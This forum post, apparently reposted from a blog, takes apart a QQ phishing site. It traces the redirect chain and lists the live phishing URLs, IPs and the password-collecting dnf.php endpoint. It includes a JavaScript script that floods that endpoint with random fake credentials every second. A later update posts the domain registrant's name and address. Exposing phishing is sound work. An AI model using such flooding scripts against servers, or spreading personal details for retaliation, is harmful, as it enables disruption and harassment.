差点被一个截图忽悠了，分析一个菜鸡写的QQ钓鱼网站

ky_wei

刚刚打开手机tim看到QQ空间有留言下面一个截图的东西(别扫进去输自己的账号密码哈，看看就得了，典型的钓鱼网站)

貌似在前几年就有此类网站，不过现在高级了些，下面就由图图来分析一下原理是什么鬼(毫无技术含量)大神快点绕道！！！

首先看到这个图片而写是熟人给你留言的，并且还是以好友备注的名字进行留言“XXX，我们合影的照片都在这里了 你太好笑了 照片呆呆的，长摁识别”会有这么一句话，好奇心强的都会点进去看~

【为什么要搞这种二维码呢？  就是为了不让一些在线解码的网站轻易识别   反而只有QQ、微信可以轻松识别出来】




然后就给你来了一个这个界面，模仿QQ空间的登录界面，还高级了点，加了所谓的“安全”键盘


看着毫无破绽，呆呆地输进账号密码，此时此刻没管对错

输完之后看到的却是QQ个人轨迹，并不是所谓的合照，而此时此刻，你输进去的账号密码就通过这个傻逼写的PHP接口进行get提交到了他的服务器中，然后通过此账号密码登录QQ空间获取好友列表和备注，进行批量地发布留言（一传十，十传百....）

我也中招了，想着不太对劲赶紧到QQ安全中心修改密码

下面就了分析一下毫无技术含量的原理吧！

简单粗暴点，就不弄什么思维导图了

用户扫码打开网址---输入账号密码---提交账号密码到php---然后跳转到QQ官方的个人轨迹活动网址---完事

首先用户扫码识别 识别内容https://w.url.cn/s/ApUGGIq  生成了腾讯短链

然后跳转到www.825480.cn/default.html#4201178?nsukey=aHR0cDovL3p4emNzLmNudnFBSFVBN0o=]http://z3nfcjel.www.825480.cn/default.html#4201178?nsukey=aHR0cDovL3p4emNzLmNudnFBSFVBN0o=[/url]

这串get后缀的nsukey的值是Base64加密的

解密后得到：http://zxzcs.cnvqAHUA7J    IP地址：120.240.95.40:8888



随后直接跳转到

https://sqd07y.coding-pages.com/agent.html?s=dCqSp4NasGicsZ%2FAWtsxTN8%2FjB39FdUm7duyDt36geIcW%2F4O7sEh5WA4mZFmVcr%2FrkhZtvSYfBjTZZrAjSV8l7f05yH28vl89Dyu6rVsojbm4BVNNKJGZ682Y5B9QWurBA6LTaJqMSLyTBDATDovkLHRJz5o7PqTHEuHaWJFwymMdHB%2BAhn8q9SIVEObQWs2IscPvCzygj3gYpEB0KOrPFyVE9d%2BzdpWZqf5Ely8lFMSyOEfguq42zQERaJVex2UZkR9e5fuDM7jRb9LrRXq%2B11y&nsukey=aHR0cHM6Ly9xZGhsY2dzLmNvbS9IVzBXOTVWVQ==

s的值不知道是用什么东西加密的

nsukey的值解码后得到：https://qdhlcgs.com/HW0W95VU

经过一波周折之后就进入了正式的界面

【https://qdhlcgs.com/】这个玩意

当时就是在这个页面输入了我的Q密，填完之后一激灵，完蛋，赶紧改密码先

在电脑浏览器上直接打开https://qdhlcgs.com/就会跳转到百度给你

审查下元素跳转宽度完美解决跳转问题，傻逼骗子判断不足啊



来随机填入账号密码然后提交



嗯~  好东西，  登录...

0000438438这个账号可能存在吗？  

点击完登录按钮之后直接通过get请求将你的账号密码提交到了https://qdhlcgs.com/dnf.php中，收集完之后估计下一步就会登录QQ空间进行群发留言......

https://qdhlcgs.com/dnf.php?u=0000438438&p=idiot-shabi

不严谨的参值，是个php小白？咱也不知道，咱也不敢问啊..

整个站点的用到的js和css全部是用外部链接

qdhlcgs.com   主机IP：36.250.0.137  中国 福建 福州 联通

请求接口：https://qdhlcgs.com/dnf.php

请求类型：GET

请求参值：u(账号)   p(密码)



光拿到了接口怎么能行，搞个循环请求

[HTML] 纯文本查看 复制代码

<!DOCTYPE html>
<html>
<head>
        <meta charset="utf-8">
    <title></title>
</head>
 
<body>
        <div class="box">
                <iframe src="" frameborder="0" width="1280" height="300" id="kuanjia"></iframe>
        </div>
</body>
<script src="http://libs.baidu.com/jquery/2.1.4/jquery.min.js"></script>
<script>
var data,dqnr;
        setInterval(function () {
        data=randomWord(false, 9);
        dqnr = "https://qdhlcgs.com/dnf.php?u="+data+"&p="+data;
        console.log(dqnr);
        $('iframe').attr('src', dqnr);
        }, 1000);
 
 
function randomWord(randomFlag, min, max){
  var str = "",
    range = min,
    arr = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'];
  if(randomFlag){
    range = Math.round(Math.random() * (max-min)) + min;
  }
  for(var i=0; i<range; i++){
    pos = Math.round(Math.random() * (arr.length-1));
    str += arr[pos];
  }
  return str;
}
</script>
 
</html>

用计时器每秒随机生成9位字符然后通过设置iframe框架的url一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环

在某爱那里有个老牛用Python写了死循环换IP请求，可以直接套用



（以后啊，看到这些东西就来分析一波....）

估计也就只有我这种小小学生才能上当了~~  噗

才疏志大不自量      西家东家笑我狂  

卑微啊~

要是能搞到未解析的PHP代码，获取这骚玩意的邮件，搞他..
原文链接：https://blog.csdn.net/qq_37428797/article/details/106576344


更新点信息
域名备案：

姓名：孙玉祥 地址：山东省青岛市保税港区莫斯科路54号1014-1室(B) 电话：133********

青岛慧理财财税咨询服务有限公司

无影

直接来一手举报

FleTime

提交方法:"GET"
提交URL:"https://cdn.jiajiags.cc/dnf.php?u=5689969589&p=fhhgddgfcvgijj"

昨天同学号被盗了，后来找出来的盗号网站

WBSL

支持楼主弄他   这种人就不能惯着

寂静的白昼

被那个二维码的款式给吸引了

ky_wei

寂静的白昼 发表于 2020-6-5 20:21
被那个二维码的款式给吸引了

一般人都会误以为是真的，我也是受害者之一

ky_wei

WBSL 发表于 2020-6-5 20:17
支持楼主弄他   这种人就不能惯着

沙发沙发沙发

某天大魔王

支持楼主弄他

chboy

浏览器红色nice

rainbow270118

骗子可恶，弄他

大宇宙飘小地球

以前遇到过，没敢点进去